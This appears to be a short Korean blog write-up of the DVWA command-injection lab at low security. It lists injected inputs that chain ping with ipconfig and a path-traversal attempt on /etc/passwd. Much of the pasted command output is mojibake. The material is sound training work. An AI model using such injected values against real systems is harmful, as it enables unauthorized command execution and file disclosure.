DVWA Command Injection [ Security Low ]
[그림 1]
Summary
[그림1] 는 Commnad Injection 공격을 시도해 볼 수 있도록 개발된 로그인 폼을 제공하고 있습니다.
Description
[그림 1] 에서는 특수문자에 대한 필터링과 입력 데이터에 대한 유효성 검사가 없기 때문에 Command Injection 공격 수행이 가능합니다.
Steps to reproduce
1. input ' & ping 127.0.0.1
Ping a device
Ping ��û���� ' ȣ��Ʈ�� ã�� �� �����ϴ�. �̸��� Ȯ���ϰ� �ٽ� �õ��Ͻʽÿ�.
Ping 127.0.0.1 32����Ʈ ������ ���:
127.0.0.1�� ����: ����Ʈ=32 �ð�<1ms TTL=128
127.0.0.1�� ����: ����Ʈ=32 �ð�<1ms TTL=128
127.0.0.1�� ����: ����Ʈ=32 �ð�<1ms TTL=128
127.0.0.1�� ����: ����Ʈ=32 �ð�<1ms TTL=128
127.0.0.1�� ���� Ping ���:
��Ŷ: ���� = 4, ���� = 4, �ս� = 0 (0% �ս�),
�պ� �ð�(�и���):
�ּ� = 0ms, �ִ� = 0ms, ��� = 0ms
2. input | ipconfig
Ping a device
Windows IP ���� �� �� ���� ����� VPN - VPN Client: �̵�� ���� . . . . . . . . : �̵�� ���� ���� ���Ằ DNS ���̻�. . . . : �̴��� ����� �̴���: �̵�� ���� . . . . . . . . : �̵�� ���� ���� ���Ằ DNS ���̻�. . . . : �̴��� ����� VirtualBox Host-Only Network: ���Ằ DNS ���̻�. . . . : ��ũ-���� IPv6 �ּ� . . . . : fe80::b0 �ڵ� ���� IPv4 �ּ� . . . . : 169.2 ����� ����ũ . . . . . . . : 255.255.0.0 �⺻ ����Ʈ���� . . . . . . : ���� LAN ����� ���� ���� ����* 1: �̵�� ���� . . . . . . . . : �̵�� ���� ���� ���Ằ DNS ���̻�. . . . : ���� LAN ����� ���� ���� ����* 3: �̵�� ���� . . . . . . . . : �̵�� ���� ���� ���Ằ DNS ���̻�. . . . : �̴��� ����� VMware Network Adapter VMnet1: ���Ằ DNS ���̻�. . . . : ��ũ-���� IPv6 �ּ� . . . . : fe80::e53 IPv4 �ּ� . . . . . . . . . : 192. ����� ����ũ . . . . . . . : 255.255.255.0 �⺻ ����Ʈ���� . . . . . . : ���� LAN ����� Wi-Fi: ���Ằ DNS ���̻�. . . . : ��ũ-���� IPv6 �ּ� . . . . : fe80::b1f5:8a IPv4 �ּ� . . . . . . . . . : 192. ����� ����ũ . . . . . . . : 255.255.255.0 �⺻ ����Ʈ���� . . . . . . : 192.
3. ;ls ../../../../../etc/passwd
Ping a device
Ping ��û���� ;ls ȣ��Ʈ�� ã�� �� �����ϴ�. �̸��� Ȯ���ϰ� �ٽ� �õ��Ͻʽÿ�
ImpactLinux 및 Windows와 같은 운영 체제 명령어 사용으로 인한 중요파일 접근 및 연계 원격코드실행(RCE)가 가능합니다.
댓글
댓글 쓰기